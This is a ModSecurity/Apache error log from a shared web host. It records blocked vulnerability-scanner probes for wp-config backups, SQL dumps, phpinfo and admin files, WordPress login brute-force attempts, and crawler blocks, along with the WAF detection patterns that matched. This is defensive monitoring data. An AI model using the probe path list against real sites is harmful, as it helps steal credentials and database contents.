[Tue May 26 19:11:25.393106 2026] [security2:error] [pid 18465:tid 18701] [client 93.123.109.10:55276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.109.123.93.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/index.php"] [unique_id "ahWjBU6GHndkguR9cLJ5ZwAAAGk"]
[Tue May 26 19:11:25.393152 2026] [security2:error] [pid 18465:tid 18602] [client 93.123.109.10:55420] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "bhavisharchitects.com"] [uri "/wp-config.php.bak"] [unique_id "ahWjBU6GHndkguR9cLJ5awAAAAc"]
[Tue May 26 19:11:25.393517 2026] [security2:error] [pid 18465:tid 18706] [client 93.123.109.10:55214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.109.123.93.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/php_info.php"] [unique_id "ahWjBU6GHndkguR9cLJ5agAAAG4"]
[Tue May 26 19:11:25.393639 2026] [security2:error] [pid 18465:tid 18620] [client 93.123.109.10:55406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.109.123.93.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wp-config.php"] [unique_id "ahWjBU6GHndkguR9cLJ5bAAAABg"]
[Tue May 26 19:11:25.393754 2026] [security2:error] [pid 18465:tid 18607] [client 93.123.109.10:55188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.109.123.93.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/info.php"] [unique_id "ahWjBU6GHndkguR9cLJ5bwAAAAw"]
[Tue May 26 19:11:25.394129 2026] [security2:error] [pid 18465:tid 18723] [client 93.123.109.10:55244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.109.123.93.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/p.php"] [unique_id "ahWjBU6GHndkguR9cLJ5cAAAAH8"]
[Tue May 26 19:11:25.395205 2026] [authz_core:error] [pid 18465:tid 18718] [client 93.123.109.10:55200] AH01630: client denied by server configuration: /home2/svijakqj/bhavisharchitects.com/php.ini
[Tue May 26 19:11:25.395640 2026] [security2:error] [pid 18465:tid 18693] [client 93.123.109.10:55460] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/wp-config.old"] [unique_id "ahWjBU6GHndkguR9cLJ5cwAAAGE"]
[Tue May 26 19:11:25.409218 2026] [security2:error] [pid 18465:tid 18695] [client 93.123.109.10:55466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.109.123.93.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wp-config-backup.php"] [unique_id "ahWjBU6GHndkguR9cLJ5dQAAAGM"]
[Tue May 26 19:11:25.411766 2026] [security2:error] [pid 18465:tid 18596] [client 93.123.109.10:55230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.109.123.93.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/info_php.php"] [unique_id "ahWjBU6GHndkguR9cLJ5ewAAAAE"]
[Tue May 26 19:11:25.413458 2026] [security2:error] [pid 18465:tid 18698] [client 93.123.109.10:55434] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "bhavisharchitects.com"] [uri "/wp-config.php.swp"] [unique_id "ahWjBU6GHndkguR9cLJ5gQAAAGY"]
[Tue May 26 19:11:25.420430 2026] [security2:error] [pid 18465:tid 18629] [client 93.123.109.10:55172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.109.123.93.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wp-config-sample.php"] [unique_id "ahWjBU6GHndkguR9cLJ5hQAAACE"]
[Tue May 26 19:11:25.553327 2026] [security2:error] [pid 18465:tid 18658] [client 93.123.109.10:55436] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/wp-config.bak"] [unique_id "ahWjBU6GHndkguR9cLJ5jwAAAD4"]
[Tue May 26 19:11:25.700431 2026] [security2:error] [pid 18465:tid 18634] [client 93.123.109.10:55358] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/wp-config.save"] [unique_id "ahWjBU6GHndkguR9cLJ5nAAAACY"]
[Tue May 26 19:11:25.701279 2026] [security2:error] [pid 18465:tid 18642] [client 93.123.109.10:55388] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/wp-config.orig"] [unique_id "ahWjBU6GHndkguR9cLJ5nQAAAC4"]
[Tue May 26 19:11:25.709237 2026] [security2:error] [pid 18465:tid 18659] [client 93.123.109.10:55350] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/db.sql"] [unique_id "ahWjBU6GHndkguR9cLJ5oQAAAD8"]
[Tue May 26 19:11:25.710907 2026] [security2:error] [pid 18465:tid 18670] [client 93.123.109.10:55460] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/dump.sql"] [unique_id "ahWjBU6GHndkguR9cLJ5owAAAEo"]
[Tue May 26 19:11:25.741203 2026] [security2:error] [pid 18465:tid 18722] [client 93.123.109.10:55500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.109.123.93.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/settings.php"] [unique_id "ahWjBU6GHndkguR9cLJ5rwAAAH4"]
[Tue May 26 19:11:25.753431 2026] [security2:error] [pid 18465:tid 18602] [client 93.123.109.10:55594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/database.sql"] [unique_id "ahWjBU6GHndkguR9cLJ5twAAAAc"]
[Tue May 26 19:11:26.014224 2026] [security2:error] [pid 18465:tid 18657] [client 93.123.109.10:55350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.109.123.93.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/admin.php"] [unique_id "ahWjBk6GHndkguR9cLJ51AAAAD0"]
[Tue May 26 19:11:26.016232 2026] [security2:error] [pid 18465:tid 18603] [client 93.123.109.10:55460] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/backup.sql"] [unique_id "ahWjBk6GHndkguR9cLJ51gAAAAg"]
[Tue May 26 19:11:26.027100 2026] [security2:error] [pid 18465:tid 18676] [client 93.123.109.10:55376] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.109.123.93.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/adminer.php"] [unique_id "ahWjBk6GHndkguR9cLJ52gAAAFA"]
[Tue May 26 19:11:26.052778 2026] [security2:error] [pid 18465:tid 18699] [client 93.123.109.10:55572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.109.123.93.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/configuration.php"] [unique_id "ahWjBk6GHndkguR9cLJ54gAAAGc"]
[Tue May 26 19:11:26.053686 2026] [security2:error] [pid 18465:tid 18627] [client 93.123.109.10:55334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.109.123.93.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/config.php"] [unique_id "ahWjBk6GHndkguR9cLJ55gAAAB8"]
[Tue May 26 19:11:26.361211 2026] [authz_core:error] [pid 18465:tid 18689] [client 93.123.109.10:55586] AH01630: client denied by server configuration: /home2/svijakqj/bhavisharchitects.com/error_log
[Tue May 26 19:11:26.697374 2026] [security2:error] [pid 18465:tid 18681] [client 93.123.109.10:55492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.109.123.93.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wp-login.php"] [unique_id "ahWjBk6GHndkguR9cLJ54QAAAFU"]
[Tue May 26 19:11:27.135228 2026] [security2:error] [pid 18465:tid 18640] [client 64.95.13.248:60569] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 248.13.95.64.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-content/plugins/wpclean/wpclean.php"] [unique_id "ahWjB06GHndkguR9cLJ6MgAAACw"]
[Tue May 26 19:11:27.277501 2026] [security2:error] [pid 18465:tid 18599] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjBk6GHndkguR9cLJ6GwAAAAQ"]
[Tue May 26 19:11:27.418737 2026] [security2:error] [pid 18465:tid 18689] [client 121.229.156.102:47734] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.toronto121mortgage.com"] [uri "/"] [unique_id "ahWjB06GHndkguR9cLJ6PAAAAF0"]
[Tue May 26 19:11:27.418834 2026] [security2:error] [pid 18465:tid 18689] [client 121.229.156.102:47734] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.toronto121mortgage.com"] [uri "/"] [unique_id "ahWjB06GHndkguR9cLJ6PAAAAF0"]
[Tue May 26 19:11:28.733364 2026] [security2:error] [pid 18465:tid 18632] [client 223.109.255.161:42566] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.toronto121mortgage.com"] [uri "/robots.txt"] [unique_id "ahWjCE6GHndkguR9cLJ6eQAAACQ"]
[Tue May 26 19:11:28.733456 2026] [security2:error] [pid 18465:tid 18632] [client 223.109.255.161:42566] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.toronto121mortgage.com"] [uri "/robots.txt"] [unique_id "ahWjCE6GHndkguR9cLJ6eQAAACQ"]
[Tue May 26 19:11:30.171197 2026] [core:crit] [pid 18465:tid 18673] (13)Permission denied: [client 76.110.9.106:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:11:31.109264 2026] [security2:error] [pid 18465:tid 18530] [remote 168.63.79.147:57626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjCk6GHndkguR9cLJ61QAALEA"]
[Tue May 26 19:11:31.437038 2026] [security2:error] [pid 18465:tid 18552] [remote 168.63.79.147:57626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjC06GHndkguR9cLJ68QAAXlY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:11:32.907275 2026] [security2:error] [pid 18465:tid 18639] [client 85.208.96.193:46440] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-6th/day/2022-12-01/"] [unique_id "ahWjDE6GHndkguR9cLJ7QgAAACs"]
[Tue May 26 19:11:32.907379 2026] [security2:error] [pid 18465:tid 18639] [client 85.208.96.193:46440] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-6th/day/2022-12-01/"] [unique_id "ahWjDE6GHndkguR9cLJ7QgAAACs"]
[Tue May 26 19:11:33.112544 2026] [autoindex:error] [pid 18465:tid 18697] [client 162.158.48.202:0] AH01276: Cannot serve directory /home2/debatqhn/crusties.agsnails.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:11:33.494296 2026] [security2:error] [pid 18465:tid 18716] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjDU6GHndkguR9cLJ7SgAAAHg"]
[Tue May 26 19:11:33.685008 2026] [security2:error] [pid 18465:tid 18472] [remote 162.214.79.109:36744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 109.79.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjDU6GHndkguR9cLJ7YwAAIAY"]
[Tue May 26 19:11:34.158654 2026] [security2:error] [pid 18465:tid 18480] [remote 162.214.79.109:36744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 109.79.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjDk6GHndkguR9cLJ7iwAATA4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:11:34.549402 2026] [security2:error] [pid 18465:tid 18577] [remote 74.7.241.58:47808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWjDk6GHndkguR9cLJ7qQAAam8"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/ru
[Tue May 26 19:11:34.786290 2026] [security2:error] [pid 18465:tid 18628] [client 74.7.228.54:37918] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "traderscafe.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWjDk6GHndkguR9cLJ7sQAAIHE"]
[Tue May 26 19:11:34.935240 2026] [security2:error] [pid 18465:tid 18652] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjDk6GHndkguR9cLJ7ogAAADg"]
[Tue May 26 19:11:35.016273 2026] [security2:error] [pid 18465:tid 18632] [client 14.236.186.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWjDk6GHndkguR9cLJ7vwAAACQ"], referer: https://www.anujtradingco.com/
[Tue May 26 19:11:36.397705 2026] [autoindex:error] [pid 18465:tid 18670] [client 162.158.48.197:0] AH01276: Cannot serve directory /home2/debatqhn/crusties.agsnails.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:11:36.588872 2026] [security2:error] [pid 18465:tid 18495] [remote 168.63.79.147:57638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjEE6GHndkguR9cLJ8DwAAHR0"]
[Tue May 26 19:11:36.933373 2026] [security2:error] [pid 18465:tid 18519] [remote 168.63.79.147:57638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjEE6GHndkguR9cLJ8JQAAWDU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:11:37.634098 2026] [security2:error] [pid 18465:tid 18626] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjEU6GHndkguR9cLJ8OQAAAB4"]
[Tue May 26 19:11:37.940295 2026] [security2:error] [pid 18465:tid 18649] [client 14.236.186.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWjEU6GHndkguR9cLJ8YgAAADU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1429973&moderation-hash=c0f3850d5153de53fa0099fbe67b232d
[Tue May 26 19:11:37.987120 2026] [core:crit] [pid 18465:tid 18676] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:11:39.528129 2026] [security2:error] [pid 18465:tid 18622] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjE06GHndkguR9cLJ8qgAAABo"]
[Tue May 26 19:11:39.706727 2026] [security2:error] [pid 18465:tid 18547] [remote 31.24.155.180:56200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjE06GHndkguR9cLJ8wwAAf1E"]
[Tue May 26 19:11:40.239217 2026] [security2:error] [pid 18465:tid 18528] [remote 31.24.155.180:56200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjFE6GHndkguR9cLJ84QAAJj4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:11:41.009362 2026] [security2:error] [pid 18465:tid 18677] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjFE6GHndkguR9cLJ8-wAAAFE"]
[Tue May 26 19:11:42.667771 2026] [security2:error] [pid 18465:tid 18688] [client 74.7.244.34:54660] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "mpdpl.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWjFk6GHndkguR9cLJ9ZQAAXGE"]
[Tue May 26 19:11:44.003266 2026] [security2:error] [pid 18465:tid 18663] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjF06GHndkguR9cLJ9ngAAAEM"]
[Tue May 26 19:11:44.132562 2026] [security2:error] [pid 18465:tid 18579] [remote 216.73.216.30:64222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/crm"] [unique_id "ahWjGE6GHndkguR9cLJ9uAAAcnE"]
